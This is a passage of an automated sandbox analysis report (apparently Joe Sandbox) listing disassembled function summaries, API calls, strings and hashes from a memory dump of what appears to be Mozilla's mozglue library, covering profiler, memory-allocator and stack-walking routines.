                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                              • String ID: GTl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                              • API String ID: 1702738223-431935292
                                              • Opcode ID: a46cbd9f78bd2b789d63a04b29a38ce6cd1df2e08e18b265afc5dfd8f7f39086
                                              • Instruction ID: 97d239ba9ce77b30b137c52c731b8e0f4eeedb9d5c16f1e009794b027e84e4ae
                                              • Opcode Fuzzy Hash: a46cbd9f78bd2b789d63a04b29a38ce6cd1df2e08e18b265afc5dfd8f7f39086
                                              • Instruction Fuzzy Hash: 7C6114B0A04244AFEB00FF64CC19F99BBF8EB4634DF06C258E9089B641D7B4A945CF95
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F70E
                                              • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C50F8F9
                                                • Part of subcall function 6C4D6390: GetCurrentThreadId.KERNEL32 ref: 6C4D63D0
                                                • Part of subcall function 6C4D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C4D63DF
                                                • Part of subcall function 6C4D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C4D640E
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F93A
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F98A
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F990
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F994
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F716
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                                • Part of subcall function 6C4CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C4CB5E0
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F739
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F746
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F793
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C54385B,00000002,?,?,?,?,?), ref: 6C50F829
                                              • free.MOZGLUE(?,?,00000000,?), ref: 6C50F84C
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C50F866
                                              • free.MOZGLUE(?), ref: 6C50FA0C
                                                • Part of subcall function 6C4D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4D55E1), ref: 6C4D5E8C
                                                • Part of subcall function 6C4D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5E9D
                                                • Part of subcall function 6C4D5E60: GetCurrentThreadId.KERNEL32 ref: 6C4D5EAB
                                                • Part of subcall function 6C4D5E60: GetCurrentThreadId.KERNEL32 ref: 6C4D5EB8
                                                • Part of subcall function 6C4D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5ECF
                                                • Part of subcall function 6C4D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C4D5F27
                                                • Part of subcall function 6C4D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C4D5F47
                                                • Part of subcall function 6C4D5E60: GetCurrentProcess.KERNEL32 ref: 6C4D5F53
                                                • Part of subcall function 6C4D5E60: GetCurrentThread.KERNEL32 ref: 6C4D5F5C
                                                • Part of subcall function 6C4D5E60: GetCurrentProcess.KERNEL32 ref: 6C4D5F66
                                                • Part of subcall function 6C4D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C4D5F7E
                                              • free.MOZGLUE(?), ref: 6C50F9C5
                                              • free.MOZGLUE(?), ref: 6C50F9DA
                                              Strings
                                              • [D %d/%d] profiler_register_thread(%s), xrefs: 6C50F71F
                                              • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C50F9A6
                                              • Thread , xrefs: 6C50F789
                                              • " attempted to re-register as ", xrefs: 6C50F858
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                              • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                              • API String ID: 882766088-1834255612
                                              • Opcode ID: 4d4a6e6e36a699c7abd76ff4acde533f585bda7ef87de42cdc4186b8084e5523
                                              • Instruction ID: 57b49295ccb49847d59fcb1488b0e568b65c8bfc62af6666c432186b40d6e4ec
                                              • Opcode Fuzzy Hash: 4d4a6e6e36a699c7abd76ff4acde533f585bda7ef87de42cdc4186b8084e5523
                                              • Instruction Fuzzy Hash: 5981D3716046049FD710EF28CC40EAEB7A5FFC5308F558A6DE8499BB51EB30A849CBD6
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50EE60
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50EE6D
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50EE92
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C50EEA5
                                              • CloseHandle.KERNEL32(?), ref: 6C50EEB4
                                              • free.MOZGLUE(00000000), ref: 6C50EEBB
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50EEC7
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50EECF
                                                • Part of subcall function 6C50DE60: GetCurrentThreadId.KERNEL32 ref: 6C50DE73
                                                • Part of subcall function 6C50DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C4D4A68), ref: 6C50DE7B
                                                • Part of subcall function 6C50DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C4D4A68), ref: 6C50DEB8
                                                • Part of subcall function 6C50DE60: free.MOZGLUE(00000000,?,6C4D4A68), ref: 6C50DEFE
                                                • Part of subcall function 6C50DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C50DF38
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50EF1E
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50EF2B
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50EF59
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50EFB0
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50EFBD
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50EFE1
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50EFF8
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F000
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C50F02F
                                                • Part of subcall function 6C50F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C50F09B
                                                • Part of subcall function 6C50F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C50F0AC
                                                • Part of subcall function 6C50F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C50F0BE
                                              Strings
                                              • [I %d/%d] profiler_stop, xrefs: 6C50EED7
                                              • [I %d/%d] profiler_pause, xrefs: 6C50F008
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                              • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                              • API String ID: 16519850-1833026159
                                              • Opcode ID: 03442b0cc0b2d389a1ce4bd6081c0a09838b9f6976c6888cfba13e74274fd118
                                              • Instruction ID: df89f763c38337af0bf89e1417aa7741baca58989e285f6b11be9b5742a935b8
                                              • Opcode Fuzzy Hash: 03442b0cc0b2d389a1ce4bd6081c0a09838b9f6976c6888cfba13e74274fd118
                                              • Instruction Fuzzy Hash: 0151C535704614DFDB00BB68DC08B997BB4EB8632CF26C769E955C3B41DBB54804C7AA
                                              APIs
                                              • AcquireSRWLockExclusive.KERNEL32(6C54E804), ref: 6C4FD047
                                              • GetSystemInfo.KERNEL32(?), ref: 6C4FD093
                                              • __Init_thread_footer.LIBCMT ref: 6C4FD0A6
                                              • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C54E810,00000040), ref: 6C4FD0D0
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E7B8,00001388), ref: 6C4FD147
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E744,00001388), ref: 6C4FD162
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E784,00001388), ref: 6C4FD18D
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54E7DC,00001388), ref: 6C4FD1B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                              • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                              • API String ID: 2957312145-326518326
                                              • Opcode ID: e237555118ce13ad6c456bb6b51e553e9f50a9f0f1fe0b5a466158bd14d051fa
                                              • Instruction ID: 7d208b0dc60aea560ec84d89ecb440519d91f7f4e654d32763fe695af7ece600
                                              • Opcode Fuzzy Hash: e237555118ce13ad6c456bb6b51e553e9f50a9f0f1fe0b5a466158bd14d051fa
                                              • Instruction Fuzzy Hash: 0B81F470B002409FEB04EF68CD44F69B7F5EB8631DF128529E92197B81D7B19806CBDA
                                              APIs
                                              • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C4D8007
                                              • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C4D801D
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C4D802B
                                              • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C4D803D
                                              • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C4D808D
                                                • Part of subcall function 6C4DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C4DCAA2
                                              • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C4D809B
                                              • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C4D80B9
                                              • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C4D80DF
                                              • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D80ED
                                              • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D80FB
                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D810D
                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C4D8133
                                              • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C4D8149
                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C4D8167
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C4D817C
                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D8199
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                              • String ID: 0>Pl
                                              • API String ID: 2721933968-19242752
                                              • Opcode ID: 66718a74ab2f4ada94e54fb868922cc388bac91d685cd68a23c924b7c34316f2
                                              • Instruction ID: 3c58d402fb0a663b3ca836125eb92a9a4fa398269da08c1148dd958f24fd8aed
                                              • Opcode Fuzzy Hash: 66718a74ab2f4ada94e54fb868922cc388bac91d685cd68a23c924b7c34316f2
                                              • Instruction Fuzzy Hash: 025144B1E001149BDB00EBA9DC84EAFB7B9AF89364F155125E815E7741E730AD09CBE1
                                              APIs
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5E9D
                                                • Part of subcall function 6C4E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5B85
                                                • Part of subcall function 6C4E5B50: EnterCriticalSection.KERNEL32(6C54F688,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5B90
                                                • Part of subcall function 6C4E5B50: LeaveCriticalSection.KERNEL32(6C54F688,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5BD8
                                                • Part of subcall function 6C4E5B50: GetTickCount64.KERNEL32 ref: 6C4E5BE4
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D5EAB
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D5EB8
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5ECF
                                              • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C4D6017
                                                • Part of subcall function 6C4C4310: moz_xmalloc.MOZGLUE(00000010,?,6C4C42D2), ref: 6C4C436A
                                                • Part of subcall function 6C4C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C4C42D2), ref: 6C4C4387
                                              • moz_xmalloc.MOZGLUE(00000004), ref: 6C4D5F47
                                              • GetCurrentProcess.KERNEL32 ref: 6C4D5F53
                                              • GetCurrentThread.KERNEL32 ref: 6C4D5F5C
                                              • GetCurrentProcess.KERNEL32 ref: 6C4D5F66
                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C4D5F7E
                                              • moz_xmalloc.MOZGLUE(00000024), ref: 6C4D5F27
                                                • Part of subcall function 6C4DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C4DCAA2
                                              • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4D55E1), ref: 6C4D5E8C
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4D55E1), ref: 6C4D605D
                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4D55E1), ref: 6C4D60CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                              • String ID: GeckoMain
                                              • API String ID: 3711609982-966795396
                                              • Opcode ID: 290772258c1e58d4ab3a51d2af7839a0bdf7e02261059c451459be4e74632ca5
                                              • Instruction ID: d28925bd1894a283ba1d8e8e074d0a1fd024435a8f3e5c554983b92aadb93768
                                              • Opcode Fuzzy Hash: 290772258c1e58d4ab3a51d2af7839a0bdf7e02261059c451459be4e74632ca5
                                              • Instruction Fuzzy Hash: DD71B5B05047409FD701EF28C890E6ABBF0FF89308F15496DD4868BB52D770E958CB92
                                              APIs
                                                • Part of subcall function 6C4C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C4C3217
                                                • Part of subcall function 6C4C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C4C3236
                                                • Part of subcall function 6C4C31C0: FreeLibrary.KERNEL32 ref: 6C4C324B
                                                • Part of subcall function 6C4C31C0: __Init_thread_footer.LIBCMT ref: 6C4C3260
                                                • Part of subcall function 6C4C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C4C327F
                                                • Part of subcall function 6C4C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4C328E
                                                • Part of subcall function 6C4C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4C32AB
                                                • Part of subcall function 6C4C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4C32D1
                                                • Part of subcall function 6C4C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C4C32E5
                                                • Part of subcall function 6C4C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C4C32F7
                                              • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C4D9675
                                              • __Init_thread_footer.LIBCMT ref: 6C4D9697
                                              • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C4D96E8
                                              • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C4D9707
                                              • __Init_thread_footer.LIBCMT ref: 6C4D971F
                                              • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4D9773
                                              • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C4D97B7
                                              • FreeLibrary.KERNEL32 ref: 6C4D97D0
                                              • FreeLibrary.KERNEL32 ref: 6C4D97EB
                                              • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4D9824
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                              • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                              • API String ID: 3361784254-3880535382
                                              • Opcode ID: 8e29faa921f6fc180b674efbf3541818ad41ca6162b1236f2a8940db61b5d973
                                              • Instruction ID: a57f0a2f834024a2084106f29ba5d070a4484ce46f62d35d4fb6a6fc27207e4a
                                              • Opcode Fuzzy Hash: 8e29faa921f6fc180b674efbf3541818ad41ca6162b1236f2a8940db61b5d973
                                              • Instruction Fuzzy Hash: B861C471600201EBDF00FF68DDA4F9A7BB1EB8A319F128229E916D3740DB35A854CB95
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(6C54F618), ref: 6C526694
                                              • GetThreadId.KERNEL32(?), ref: 6C5266B1
                                              • GetCurrentThreadId.KERNEL32 ref: 6C5266B9
                                              • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C5266E1
                                              • EnterCriticalSection.KERNEL32(6C54F618), ref: 6C526734
                                              • GetCurrentProcess.KERNEL32 ref: 6C52673A
                                              • LeaveCriticalSection.KERNEL32(6C54F618), ref: 6C52676C
                                              • GetCurrentThread.KERNEL32 ref: 6C5267FC
                                              • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C526868
                                              • RtlCaptureContext.NTDLL ref: 6C52687F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                              • String ID: WalkStack64
                                              • API String ID: 2357170935-3499369396
                                              • Opcode ID: 23bf87513431a1ab8a988123ca44c95f8c04492eea9fe8e5a87bfd96ffc53318
                                              • Instruction ID: f08b1432fbfee278762a410c83b0d4c8746076366c44792d8afbdde035d0e69f
                                              • Opcode Fuzzy Hash: 23bf87513431a1ab8a988123ca44c95f8c04492eea9fe8e5a87bfd96ffc53318
                                              • Instruction Fuzzy Hash: 7251AB71A09301AFDB11DF24CC44A5ABBF4FF89718F05892DF59887680DB74E9188B96
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50DE73
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50DF7D
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50DF8A
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50DFC9
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50DFF7
